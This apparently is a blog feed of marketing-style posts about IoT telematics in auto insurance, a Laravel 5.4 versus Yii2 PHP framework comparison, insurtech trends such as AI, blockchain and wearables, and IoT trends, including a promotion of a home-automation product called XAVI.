
Auto Insurance:

Telematics like monitoring automobile speed, the behavior of a rash driver could assist in making a clear judgment of claim policies for individuals and insurance firm.

Hence while IoTs and interconnected network could be a boom in offering policies, these minuscule are taking insurance services to the next step.A huge amount of data generated by the IoT devices can be used for predictions, understanding of the market, customers etc, that will help in distributions the policies in a very effective manner as well as a great customer satisfactions.

Laravel 5.4 Vs Yii2 : PHP Frameworks Comparison

 laravel

PHP frameworks make development faster. Among various frameworks, Laravel & Yii are two widely used frameworks. Recent releases are Laravel 5.4 & Yii2, we have analyzed the functioning of both these frameworks from the developer’s point of view.

Requirements

Yii is used by programmers for developing web portals and much more. The latest version Yii2 requires PHP5.4 or higher versions.
Laravel is designed for the purpose of building high-end web applications. Laravel 5.4 will be functioning only on PHP 5.6.4 or higher end versions.
Laravel Requires OpenSSL Extension, Mbstring Extension, Tokenizer Extension also.

Extensions

Both Frameworks offering various kinds of useful extensions. Programmers can find many valuable extensions in these frameworks. Laravel has a various number of user contributed / commercial extensions compared to Yii2. It has various kind of extensions providing different scopes in functionality which is ahead of Yii.

Object Relational Mapping

Yii2 Framework feature data access objects, Doctrine2 through plugins and Active Record Pattern. Laravel Also provides the same.

The object relational mapping (ORM ) of Laravel is Eloquent and Yii is Active Record.

Security

Yii2 and Laravel5.4 both have more security features related to authentication, authorization, SQL injections, CSRF coupled with the core code. Whereas Laravel provides these security measures with several extension packages.

Performance

When it comes to the performance of these two frameworks Yii is considerably fast when we compare with Laravel. Laravel5.4 takes 2ms as application startup time whereas Yii2 startup time is1ms.
Also, Yii has a wonderful caching system and supports DB based page, Memcache, XCache, segment caching and APC. While in Laravel cache necessities include Database, Memcached, and Redis.

Templating Engine

Laravel5.4 Using blade templating, which is simple yet powerful templating engine where you can use plain PHP code into views unlike other PHP templating engines. Blade view files are stored in .blade.php file extension. Vue.js javascript frameworks can be used for Laravel.
Yii doesn’t use any third party templating system by default. Still, Twig Or Smarty Template Engines can be used.

Conclusion

The selection of framework is clearly based on project requirements, Yii overtakes Laravel in some aspects like security and fast performance. Programmers should use the Laravel framework to avoid coding flaws.

Both these frameworks have their own pros and cons but Laravel and Yii both are excellent frameworks to work on.

Top Latest Trends in Insurance Tech

technology-illustration-shutterstock-crop-600x338--crop-600x338

Today, the insurance industry is at a digital transformative phase to enhance the business models. There are few key areas we can expect insurers to embrace as they seek to create more automated, user-friendly processes in Insurance sector.

Use of automations and artificial intelligence  

Insurance industry is shifting towards exploring automation of more complex and risky processes rather using of traditional method, which is less effective in case of time and accuracy. Using of emerging technologies like Artificial Intelligence and Machine learning provide the scope of intelligent automation for analysis of huge amount of data generated by IoT and smart wearables devices. These Analysis and cross checking of data help understanding the better customer insights, fraud detections, claims verification and processing.

With the more refined automated technologies and capability of analysing more data, insurance companies like AIG started employing smart drone for automated property assessment and claims processing, which not only helps in accurate assessment but reduces the operational cost also.

Redefining of Insurance distributions

For better user experience, insurers have already generalized the new channel of distribution such as online research, comparison platforms and chatbot for better interaction and understanding, which already impacted in the market of personal insurances. The new direct distribution channels and online comparison platform for direct small insurances are likely to be more effective in coming days.

Companies like Allstate is already allowing small business owner to buy policies in just five minutes, or P2P platform like Gather giving the opportunity to small business owner to self insure and coverage is offered through a captive which is owned by the businesses it insures.Thus offering greater transparency and reducing cost in policies for these type of enterprise.

Insurance through value chain disaggregation

As the market is growing, the specialization in sectors is becoming more popular. As insurers move into advanced and extreme digital stages there is more use of data, automation, connectivity, ecosystem integration, new development methodologies, and a smarter use of IT resources. Some of these companies are providing customer interface with a unique value propositions, some companies provides tools for specialized software solutions for the insurers.

Companies like PolicyBazar provides insurance comparison and gives customized suggestions and recommendations based on the customer needs and choices, using their artificial intelligence.

Data analytics to improve profitability and better customer experience

The exponentially greater data availability and better analytical capability of softwares provide the base of making decision. Cross checking and analysing on the large amount of data coming from various unstructured resources such as social media real time data through various connected devices, helps in better risk management to drive greater profitability as well as better customer experience. Applying a combination of techniques such as predictive modeling, text mining, databases searches and exception reporting, insures are able to understand better customer insight, fraud analytics which help them in making insight driven strategies and risk mitigation strategies.

Sensors, Detectors, and Telematics  for building data

IoT or internet of things refers to the physical objects that are embedded with sensors, which gather information about specific objects and transmit it. These transmitted data are then analyzed as discussed earlier.

In insurances, using of IoT technologies is becoming more popular. In case of home insurances, smart homes is one of the fastest growing segment. Insurances companies are giving more discount on policies for an internet connected Home/Smart home.

Various wearable devices are also in demand as it enables life and health insurers to better engage with customers while obtaining real time insight into risk. Aditya Birla Health  Insurance is offering their policyholders health benefits and rewards for connecting their approved apps and wearable devices to their health app so they can track one’s activity.

Property and casualty insurance companies like AIG , are going to use smart drone for better property assessment.

Blockchain Technology for fraud detection

In coming days Distributed Ledger Technology(DLT) or Blockchain Technology is going to be leveraged across all sector including Insurance for its revolutionary way of sending, receiving and storing information in a secure and decentralized way. Using of Blockchain technology in insurance will improve the quality of service, increase in the volume of data from new data sources, automate claims, also will reduce the operational costs. It has the potential to ease out fraud detection and risk prevention as per a report from EY.

Once insurance and blockchain technology are interconnected, key business process like policy management and claims management are likely to transformed and new business model are expected to emerge using Blockchain.

Augmented Reality/Virtual Reality in Insurance

Though Augmented Reality is leveraged by many other sectors, like in social media or in gaming and other sectors, insurance sector still is limited to areas like marketing or training by simplifying complex explanations, meant for customers and employees. How about a 3D modeling and simulations help customers in making insurance claims easier and faster? Or how about before you go for the home insurance a simulation helps you pinpoint all the areas under insurance rather than reading the lengthy document?

There are big challenges ahead for insurers. With more changing technologies, executives will need to carefully consider the opportunities.

 

 

 

IoT World is getting trendier and fashionable with these Latest trends

xl-2016-internet-of-things-1

Let your treadmill pass on the data to your wearable hand devices that could be read on your smart phone with visual and analytics. Or how about you casting your mobile to Office projector while all are having their evening snacks and enjoying live cricket?

Let’s see what are the latest trends in IOT.

Welcome to Connected World!

Research experts like Gartner Say 8.4 Billion Connected “Things” Will Be in Use in 2017, Up 31 Percent From 2016. On the other hand, firms like Intel predicts that there would 200 million connected devices by 2020. With such a rapid growth startups and big firms are keen in observing the space. So, here we bring on the latest trends shaping the world of IoT [ Internet of things].

An Increase in Miniscule Products

Products like sensors and cameras may be little in existence, but the power they hold makes them sustainable in the long run. Smart homes, Smart cars, climate control, home security are some of the aspects that need these sensors and devices. In future, we may see them as default items in IoT world, but for now, they are the stepping stone and would create an impact in IoT domain.

Evolution of IoT Squares 

A very peculiar case of IoT is that the Amazon Prime video cannot be cast via Google Chormecast, the user needs to purchase Amazon Firestick if he must enable casting. With such a wide range of hardware and software list, users can’t be loyal to just one firm. Hence the need for gateways that allow software’s, hardware, apps, devices of various vendors to connect, interact and communicate without the need to change it.

These markets would not only help the users but the firms who want to want to automate their legacy equipment. They could just tap into industrial drivers, hubs, data visualization, monitoring and data mapping modules and reap the benefits.

Let the Data Do the Talking

Big Data is not an emerging trend anymore, but a default technology adopted by most of the businesses. However using Big data with IoT cloud could help many firms in making an informed decision. Just for example an insurtech firm could gather the driving behavior and pattern of his customer using sensors and could design a customized policy that suits his needs.

IoT Analytics is an upcoming trend, and many of the start-ups are eager to provide the optimum solution to other businesses.

Integrate IoT with Machine Learning

Machine learning is another emerging trend that experts are confident would change the future. But its benefits could be manifold if it’s integrated with IoT. Mantra’s innovative solution XAVI is the best example here. Just imagine you entering the home after a long tiring day and wished someone could switch on your lights tv and air conditioner. XAVI is a genie that allows you to do so with your voice or through a mobile app. As you get comfortable on your sofa, you could issue a command to list all English movie to be aired in next 15 minutes, and in no time, you could have an exclusive list of it on your tv screen. For more features click here.

It would also help firms in gathering data of individual usage patterns and would assist them in building more cognitive technology.

Security the Major Opportunity

With every new technology first question posed is – Is it safe? While many people believe interconnection could make systems more vulnerable to attacks, the opportunists believe it as a space to explore and come with a more robust solution to keep devices and data protected.